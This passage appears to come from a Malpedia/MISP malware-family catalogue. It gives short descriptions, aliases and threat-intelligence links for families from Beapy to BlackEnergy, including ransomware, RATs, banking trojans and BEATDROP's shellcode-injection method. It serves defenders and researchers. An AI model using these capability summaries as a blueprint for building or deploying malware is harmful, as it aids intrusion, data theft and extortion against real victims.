https://cofense.com/blog/bazarbackdoor-stealthy-infiltration

https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/

https://thedfirreport.com/2021/12/13/diavol-ransomware/

https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon

https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/

https://www.cybereason.com/hubfs/A%20Bazar%20of%20Tricks%20Following%20Team9%E2%80%99s%20Development%20Cycles%20IOCs.pdf

https://experience.mandiant.com/trending-evil/p/1

https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets

https://thedfirreport.com/2020/10/08/ryuks-return/

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti

https://fr3d.hk/blog/campo-loader-simple-but-effective

https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf

https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware

https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/

https://www.scythe.io/library/threatthursday-ryuk

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/

https://johannesbader.ch/blog/yet-another-bazarloader-dga/

https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/

https://johannesbader.ch/blog/a-bazarloader-dga-that-breaks-during-summer-months/

https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident

https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth

https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/

https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html

https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/

https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e

https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://www.trendmicro.com/en_us/research/21/k/bazarloader-adds-compromised-installers-iso-to-arrival-delivery-vectors.html

https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/

https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

Beapy

According to Symantec, Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks.

The tag is: misp-galaxy:malpedia="Beapy"

Beapy is also known as:

Table 2994. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.beapy

https://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china

BEATDROP

According to Mandiant, BEATDROP is a downloader written in C that uses Atlassian’s project management service Trello for C&C. BEATDROP uses Trello to store victim information and retrieve AES-encrypted shellcode payloads to be executed. BEATDROP then injects and executes downloaded payloads into a suspended process. Upon execution, BEATDROP maps a copy of ntdll.dll into memory to execute shellcode in its own process. The sample then creates a suspended thread with RtlCreateUserThread the thread points to NtCreateFile. The sample changes execution to shellcode and resumes the thread. The shellcode payload is retrieved from Trello and is targeted per victim. Once the payload has been retrieved, it is deleted from Trello.

The tag is: misp-galaxy:malpedia="BEATDROP"

BEATDROP is also known as:

Table 2995. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.beatdrop

https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/

https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns

https://mp.weixin.qq.com/s?biz=MzUyMDEyNTkwNA%3D%3D&mid=2247494783&idx=1&sn=612cf3cea1ef62e04bfb6bd0ce3b6b65&chksm=f9ed80c0ce9a09d6f5edc1424df5260cb9a9cf55fe92bd922407eef960650e91ec8cc46933ab&scene=178&cur_album_id=1375769135073951745

https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf

https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58

Bee

Malware family observed in conjunction with PlugX infrastructure in 2013.

The tag is: misp-galaxy:malpedia="Bee"

Bee is also known as:

Table 2997. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bee

https://www.virustotal.com/gui/file/38f9ce7243c7851d67b24eb53b16177147f38dfffe201c5bedefe260d22ac908/detection

beendoor

BEENDOOR is a XMPP based trojan. It is capable of taking screenshots of the victim’s desktop.

The tag is: misp-galaxy:malpedia="beendoor"

beendoor is also known as:

Table 2998. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

BeepService

The tag is: misp-galaxy:malpedia="BeepService"

BeepService is also known as:

Table 2999. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.beepservice

https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

Belonard

Once set up in the system, Trojan.Belonard replaces the list of available game servers in the game client and creates proxies on the infected computer to spread the Trojan. As a rule, proxy servers show a lower ping, so other players will see them at the top of the list. By selecting one of them, a player gets redirected to a malicious server where their computer become infected with Trojan.Belonard.

The tag is: misp-galaxy:malpedia="Belonard"

Belonard is also known as:

Table 3000. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.belonard

https://news.drweb.com/show/?i=13135&c=23&lng=en&p=0

BestKorea

The tag is: misp-galaxy:malpedia="BestKorea"

BestKorea is also known as:

Table 3003. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bestkorea

https://github.com/Jacquais/BestKorea

Bezigate

Bezigate is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files.

The Trojan may perform the following actions: List, move, and delete drives List, move, and delete files List processes and running Windows titles List services List registry values Kill processes Maximize, minimize, and close windows Upload and download files Execute shell commands Uninstall itself

The tag is: misp-galaxy:malpedia="Bezigate"

Bezigate is also known as:

Table 3005. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bezigate

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

BfBot

The tag is: misp-galaxy:malpedia="BfBot"

BfBot is also known as:

Table 3006. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot

BHunt

BHunt collects the crypto wallets of its victims. The malware consists of several functions/modules, e.g. a reporting module that reports the presence of crypto wallets on the target computers to the C2 server. It searches for many different cryptocurrencies (e.g. Atomic, Bitcoin, Electrum, Ethereum, Exodus, Jaxx and Litecoin). The Blackjack module is used to steal wallets, Sweet_Bonanza steals victims' browser passwords. There are also modules like the Golden7 or the Chaos_crew module.

The tag is: misp-galaxy:malpedia="BHunt"

BHunt is also known as:

Table 3007. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bhunt

https://blogs.blackberry.com/en/2022/02/threat-thursday-bhunt-scavenger

https://www.bleepingcomputer.com/news/security/new-bhunt-malware-targets-your-crypto-wallets-and-passwords/

https://www.bitdefender.com/files/News/CaseStudies/study/411/Bitdefender-PR-Whitepaper-CyberWallet-creat5874-en-EN.pdf

BianLian (Windows)

BianLian is a GoLang-based ransomware that continues to breach several industries and demand large ransom amounts. The threat actors also use the double extortion method by stealing an affected organization’s files and leaking them online if the ransom is not paid on time. BianLian gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian originally employed a double-extortion model in which they encrypted victims’ systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion. The BianLian ransomware uses goroutines and encrypts files in chunks to quickly hijack an infected system. The ransomware adds its own extension to each encrypted file.

The tag is: misp-galaxy:malpedia="BianLian (Windows)"

BianLian (Windows) is also known as:

Table 3008. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bianlian

https://twitter.com/malwrhunterteam/status/1558548947584548865

https://blogs.blackberry.com/en/2022/10/bianlian-ransomware-encrypts-files-in-the-blink-of-an-eye

https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/

https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/

https://embee-research.ghost.io/building-advanced-censys-queries-utilising-regex-bianlian/

https://blog.cyble.com/2022/08/18/bianlian-new-ransomware-variant-on-the-rise/

https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/

https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/

BI_D Ransomware

Small and relatively simple ransomware for Windows. Gives files the .BI_D extension after encrypting them with a combination of RSA/AES. Persistence achieved via the Windows Registry. Kills all processes on the victim machine besides itself and a small whitelist of mostly Windows sytem processes and kills shadow copies.

The tag is: misp-galaxy:malpedia="BI_D Ransomware"

BI_D Ransomware is also known as:

Table 3009. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware

http://zirconic.net/2018/07/bi_d-ransomware/

http://zirconic.net/2019/03/bi_d-ransomware-redux-now-with-100-more-ghidra/

BillGates

BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.

BillGates is available for *nix-based systems as well as for Windows.

On Windows, the (Bill)Gates installer typically contains the various modules as linked resources.

The tag is: misp-galaxy:malpedia="BillGates"

BillGates is also known as:

Table 3011. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates

https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/

https://habrahabr.ru/post/213973/

https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html

https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/

https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf

https://securelist.com/versatile-ddos-trojan-for-linux/64361/

https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server

Binanen

Binanen is a dropper that drops and executes a section of itself into a hidden dummy process. According to F-Secure, it executes command line tools such as (for example) asipconfig, which is useful to retrieve the network configuration. The malware aims to steal information about the machine, the username, installed software and, more generally speaking, it potentially can carry out actions on the compromised machine.

The tag is: misp-galaxy:malpedia="Binanen"

Binanen is also known as:

Table 3012. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.binanen

https://www.secureworks.com/research/threat-profiles/bronze-fleetwood

https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/TrojBinanen-B/detailed-analysis.aspx

bioload

The tag is: misp-galaxy:malpedia="bioload"

bioload is also known as:

Table 3014. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bioload

https://www.fortinet.com/blog/threat-research/bioload-fin7-boostwrite-lost-twin.html

BIOPASS

BIOPASS RAT is a malware family which targets online gambling companies in China by leveraging a watering hole attack. This Remote Access Trojan (RAT) is unique in that it leverages the Open Broadcaster Software (OBS) framework to monitor the user’s screen.

The tag is: misp-galaxy:malpedia="BIOPASS"

BIOPASS is also known as:

Table 3015. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.biopass

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf

https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html

BitPyLock

Bitpylock is a ransomware that encrypts files by using asymmetric keys and puts '.bitpy' as suffix once the encryption phase ended. The ransom note appears on the affected user’s Desktop with the following name: "# # HELP_TO_DECRYPT_YOUR_FILES # .html". At the time of writing the ransom request is 0.8 BTC and the communication email is: helpbitpy@cock.li.

The tag is: misp-galaxy:malpedia="BitPyLock"

BitPyLock is also known as:

Table 3018. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bitpylock

https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/

https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview

https://twitter.com/malwrhunterteam/status/1215252402988822529

Bitsran

SHADYCAT is a dropper and spreader component for the HERMES 2.1 RANSOMWARE radical edition.

The tag is: misp-galaxy:malpedia="Bitsran"

Bitsran is also known as:

  • SHADYCAT

Table 3019. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran

http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html

https://content.fireeye.com/apt/rpt-apt38

https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug-180129.pdf

BitRAT

According to Bitdefender, BitRAT is a notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums. Its price tag of $20 for lifetime access makes it irresistible to cybercriminals and helps the malicious payload spread.

Furthermore, each buyer’s modus operandi makes BitRAT even harder to stop, considering it can be employed in various operations, such as trojanized software, phishing and watering hole attacks.

BitRAT’s popularity arises from its versatility. The malicious tool can perform a wide range of operations, including data exfiltration, UAC bypass, DDoS attacks, clipboard monitoring, gaining unauthorized webcam access, credential theft, audio recording, XMRig coin mining and generic keylogging.

The tag is: misp-galaxy:malpedia="BitRAT"

BitRAT is also known as:

Table 3021. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat

https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware

https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

https://blog.qualys.com/vulnerabilities-threat-research/2023/01/03/bitrat-now-sharing-sensitive-bank-data-as-a-lure

https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/

https://www.fortinet.com/blog/threat-research/nft-lure-used-to-distribute-bitrat

https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md

https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html

https://asec.ahnlab.com/en/32781/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities

https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/

https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/

https://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/

https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/

https://www.bitdefender.com/blog/hotforsecurity/bitrat-malware-seen-spreading-through-unofficial-microsoft-windows-activators/

https://www.bleepingcomputer.com/news/security/bitrat-malware-now-spreading-as-a-windows-10-license-activator/

https://www.youtube.com/watch?v=CYm3g4zkQdw

https://community.riskiq.com/article/ade260c6

https://isc.sans.edu/forums/diary/A+Zip+Bomb+to+Bypass+Security+Controls+Sandboxes/28670/

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf

https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt

Bizzaro

Kaspersky Labs characterizes Bizarro as yet another banking Trojan family originating from Brazil that is now found in other regions of the world. They have seen users being targeted in Spain, Portugal, France and Italy. Attempts have now been made to steal credentials from customers of 70 banks from different European and South American countries.

The tag is: misp-galaxy:malpedia="Bizzaro"

Bizzaro is also known as:

Table 3022. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bizarro

https://securelist.com/bizarro-banking-trojan-expands-its-attacks-to-europe/102258/

BKA Trojaner

BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.

The tag is: misp-galaxy:malpedia="BKA Trojaner"

BKA Trojaner is also known as:

  • bwin3_bka

Table 3023. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner

https://www.evild3ad.com/405/bka-trojaner-ransomware/

Black Basta (Windows)

"Black Basta" is a new ransomware strain discovered during April 2022 - looks in dev since at least early February 2022 - and due to their ability to quickly amass new victims and the style of their negotiations, this is likely not a new operation but rather a rebrand of a previous top-tier ransomware gang that brought along their affiliates.

The tag is: misp-galaxy:malpedia="Black Basta (Windows)"

Black Basta (Windows) is also known as:

  • no_name_software

Table 3024. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/

https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/

https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://securityscorecard.pathfactory.com/all/a-deep-dive-into-bla

https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html

https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/

https://securityscorecard.com/research/a-deep-dive-into-black-basta-ransomware

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/

https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies

https://www.youtube.com/watch?v=iD_KZAqNDZ0

https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/

https://www.reliaquest.com/blog/qbot-black-basta-ransomware/

https://www.bleepingcomputer.com/news/security/american-dental-association-hit-by-new-black-basta-ransomware/

https://gbhackers.com/black-basta-ransomware/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta

https://www.zscaler.com/blogs/security-research/back-black-basta

https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta

https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis

https://securelist.com/luna-black-basta-ransomware/106950

https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/

https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview

https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware

BlackByte

Ransomware. Uses dropper written in JavaScript to deploy a .NET payload.

The tag is: misp-galaxy:malpedia="BlackByte"

BlackByte is also known as:

Table 3025. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbyte

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/

https://www.bleepingcomputer.com/news/security/fbi-blackbyte-ransomware-breached-us-critical-infrastructure/

https://de.darktrace.com/blog/detecting-the-unknown-revealing-uncategorised-ransomware-using-darktrace

https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt

https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/

https://twitter.com/splinter_code/status/1628057204954652674

https://redcanary.com/blog/blackbyte-ransomware/

https://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html

https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/

https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups

https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants

https://www.ic3.gov/Media/News/2022/220211.pdf

https://therecord.media/san-francisco-49ers-confirm-ransomware-attack/

BlackCat (Windows)

ALPHV, also known as BlackCat or Noberus, is a ransomware family that is deployed as part of Ransomware as a Service (RaaS) operations. ALPHV is written in the Rust programming language and supports execution on Windows, Linux-based operating systems (Debian, Ubuntu, ReadyNAS, Synology), and VMWare ESXi. ALPHV is marketed as ALPHV on cybercrime forums, but is commonly called BlackCat by security researchers due to an icon of a black cat appearing on its leak site. ALPHV has been observed being deployed in ransomware attacks since November 18, 2021.

ALPHV can be configured to encrypt files using either the AES or ChaCha20 algorithms. In order to maximize the amount of ransomed data, ALPHV can delete volume shadow copies, stop processes and services, and stop virtual machines on ESXi servers. ALPHV can self-propagate by using PsExec to remote execute itself on other hosts on the local network.

The tag is: misp-galaxy:malpedia="BlackCat (Windows)"

BlackCat (Windows) is also known as:

  • ALPHV

  • Noberus

Table 3026. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware

https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html

https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive

https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/

https://id-ransomware.blogspot.com/2021/12/blackcat-ransomware.html

https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware

https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/

https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809

https://x.com/vxunderground/status/1731138180672344095?t=reBMQQFFMGQ_zkV8KmL_LA&s=01

https://killingthebear.jorgetesta.tech/actors/alphv

https://www.theregister.com/2023/11/16/blackcat_ransomware_luring_corporate_targets/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022

https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/

https://cocomelonc.github.io/book/2023/12/13/malwild-book.html

https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3

https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html

https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/

https://mssplab.github.io/threat-hunting/2023/07/13/malware-analysis-blackcat.html

https://www.ic3.gov/Media/News/2022/220420.pdf

https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/

https://community.riskiq.com/article/47766fbd

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor

https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://unit42.paloaltonetworks.com/blackcat-ransomware/

https://www.intrinsec.com/alphv-ransomware-gang-analysis

https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/

https://www.intrinsec.com/alphv-ransomware-gang-analysis/

https://securelist.com/a-bad-luck-blackcat/106254/

https://blog.group-ib.com/blackcat

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://securityscorecard.com/blog/ttps-associated-with-new-version-of-blackcat-ransomware

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://www.varonis.com/blog/alphv-blackcat-ransomware

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps

https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html

https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware

https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/

https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/

https://www.mandiant.com/resources/blog/alphv-ransomware-backup

https://github.com/f0wl/blackCatConf

https://www.trellix.com/about/newsroom/stories/research/scattered-spider-the-modus-operandi/

https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a

https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack

https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments

https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html

https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

BlackEnergy

BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.

Version 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to - download and execute a remote file; - execute a local file on the infected computer; - update the bot and its plugins;

The Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.

